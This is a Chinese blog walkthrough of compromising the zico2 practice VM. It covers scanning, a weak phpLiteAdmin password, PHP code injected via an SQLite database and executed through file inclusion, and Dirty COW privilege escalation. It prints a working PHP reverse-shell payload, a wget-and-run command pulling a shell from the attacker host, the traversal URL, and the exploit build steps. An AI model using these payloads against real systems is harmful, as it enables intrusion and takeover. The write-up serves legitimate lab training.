靶机实战(zico2)

最新推荐文章于 2024-08-01 21:35:08 发布
最新推荐文章于 2024-08-01 21:35:08 发布
阅读量660 收藏 1
点赞数
分类专栏: 靶机实战 文章标签: 安全 黑盒测试 安全漏洞 linux 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45605313/article/details/106450080
版权

zico2

实验环境

靶机:zico2
测试机: win10 ,kali

实验过程

信息收集

主机发现

靶机IP:192.168.238.156
在这里插入图片描述

端口扫描

在这里插入图片描述
在这里插入图片描述

网站指纹

在这里插入图片描述

目录扫描

网站主页
在这里插入图片描述
在这里插入图片描述

漏洞发现

数据库登录口(弱口令爆破,sql注入,逻辑漏洞等)
在这里插入图片描述

密码:admin 进到了数据库

在这里插入图片描述

先看到两个用户尝试解密
root:34kroot34
zico:zico2215@
登陆下ssh(登不进去)

在这里插入图片描述

searchsploit扫到一个数据库漏洞

在这里插入图片描述

漏洞利用

意思是一个php代码执行漏洞
攻击者可以创建带有php扩展名的sqlite数据库,并将php代码作为文本字段插入。
完成后,攻击者只需使用Webbrowser访问数据库文件即可执行该操作。

在这里插入图片描述
找到页面文件包含漏洞
在这里插入图片描述
在这里插入图片描述
可以结合上面的php远程代码执行,新建个数据库

在这里插入图片描述
在这里插入图片描述
进行反弹shell

<?php $sock=fsockopen("192.168.238.143",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>

在这里插入图片描述

kali监听:nc -nvlp 1234
连接不稳定换种方式

在这里插入图片描述

kali开启apache服务var/www/html下写入反弹shell

在这里插入图片描述

重新写入
<?php system("wget 192.168.238.143/shell.txt -O /tmp/shell.php;php /tmp/shell.php");?>

在这里插入图片描述

监听,利用文件包含访问
http://192.168.238.156/view.php?page=../../../../usr/databases/shell.php
拿到shell

在这里插入图片描述

提权

脏牛提权

反弹个终端
python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

提权脚本放到kali,apache服务网站根目录下
到tmp目录下wget 192.168.238.143/dirtycow.c

在这里插入图片描述

编译:
gcc -pthread dirtycow.c -lcrypt -o dirtycow

在这里插入图片描述

chmod 777 dirtycow
./dirtycow

在这里插入图片描述

会创建一个firefart用户覆盖root
su firefart输入密码拿到管理员权限

在这里插入图片描述

总结

1 得到shell,尽量在tmp(权限小)目录下操作
2 发现的用户名,可尝试ssh等多种登录
3.文件包含的标志(page,file,path,load等)
3 数据库弱口令,数据库写入代码,结合文件包含执行(要知道路径)

~~...
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶场渗透(五)——zico2渗透
Ramona的博客
08-10 614
测试环境 靶机:cizo2打开虚拟机后设为nat模式 攻击机:kali,windows10 信息收集 • nmap扫描ip,端口和服务,根据扫描结果可得 ip:192.168.111.138 端口及服务:22 ssh;80 http;111 渗透测试 • 访问网站,查看源码也没发现有价值的线索,爆破目录发现了敏感目录dbadmin且存在遍历漏洞 • 访问test_d...
靶机渗透测试实战(六)——Zico2渗透实战
橘子女侠
05-11 7078
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
zico2靶机
薛定谔嘚喵博客
03-19 400
文件包含,远程php代码执行漏洞,一句话木马
vulnhub zico2 靶场练习
鸥鹭忘机
12-22 3575
前言 这次练习的靶机是vulnhub平台的zico2。下载地址为:https://www.vulnhub.com/entry/zico2-1,210/。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击zico2靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 收集信息 通过arp协议扫描局域网,又快又准,但是只能扫描局域网内的ip。 arp-scan -l 发现靶机的IP地址为 `192.168.
入门靶机渗透之zico2
Yaphst的博客
03-08 6193
靶场介绍 靶机下载地址:点击进入下载界面 下载.ova文件,在VMware中导入该虚拟机,导入完成后配置网卡,确保与自己的攻击机在同一网段,然后开启虚拟机。 Zico 正在尝试建立他的网站,但在选择要使用的 CMS 时遇到了一些麻烦。 在尝试了一些流行的CMS之后,他决定建立自己的。 这是个好主意吗? 目标:拿到root权限,获取flag 信息收集 打开kali,查看kali的IP地址 目标靶机与kali在同一网段,使用nmap对所在网段进行扫描,探测主机 判断192.168.115.134是靶机
靶机综合渗透环境(zico2手册).pdf
04-07
靶机综合渗透环境——zico2渗透实战
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
zico2靶机练习
SYJ_361的博客
03-27 2959
本文是对zico2靶机的练习,通过kali和御剑等工具对靶机进行信息收集,利用phpLiteAdmin漏洞,并利用文件包含漏洞上传文件,用蚁剑连接,并通过kali进行反弹shell,最后用ssh登录,对靶机进行提权,并找到flag文件
靶机操作练习,earth 靶机实战练习
09-08
通过这样的实战练习,我们可以更深入地理解网络攻防技术,提高安全意识和应对能力。同时,这也提醒我们,对于系统安全,应确保及时更新补丁,限制不必要的服务,以及设置强密码,以防止类似攻击的发生。
【vulnhub】zico2靶机
最新发布
weixin_62162207的博客
08-01 349
zico2靶机:打靶训练
渗透靶机测试之zico2
hclimg的博客
07-16 628
1.使用nmap扫描,发现主机地址 发现zico2主机地址:192.168.232.130 nmap的-sn参数表示只进行主机发现,不进行端口扫描,然后在浏览器中输入地址,得到首页网站 2.使用nmap进行详细的扫描 -sT -sC -sV 进行系统版本检测 -p- 扫描常用端口 3.使用dirb进行目录浏览 ![在这里插入图片描述](https://img-blog.csdnimg.cn/...
kali渗透综合靶机(五)--zico2靶机
W小哥
03-10 1397
一、靶机下载 下载链接:https://download.vulnhub.com/zico/zico2.ova 二、node1靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.27.128 靶机IP:192.168.27.132 1、主机发现 nmap ...
靶机渗透(五)Zico2
qq_42180996的博客
04-26 3072
靶机Zico2 一、实验环境 二、实验步骤 (一)信息收集 1.查看测试机的IP信息,判断所处网段 2.主机发现(netdiscover) 3.端口扫描(masscan/nmap) (二)Web渗透 1.浏览web网页(80端口) 2.尝试利用文件包含漏洞 3.网站指纹信息扫描(whatweb) 4.目录扫描(dirb) 5.访问/dbadmin目录 6.查找数据库...
渗透测试靶机zico2
m0_70830611的博客
03-28 362
进入zico家目录后,发现了wordpress目录,进去发现有一个wp-config.php文件可以查看数据库账号密码。搜索一下phpLiteAdmin v1.9.3是否存在可以利用的漏洞。用弱口令admin登录,发现是一个SQLite数据库管理工具。密码为sWfCsfJSPV9H3AmQzw8,尝试ssh登录。根据给的提示信息,先创建一个数据库.选择了24404.txt。
Vulnhub-Zico2靶机实战
御七彩虹猫
03-24 3216
Vulnhub-Zico2靶机实战
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值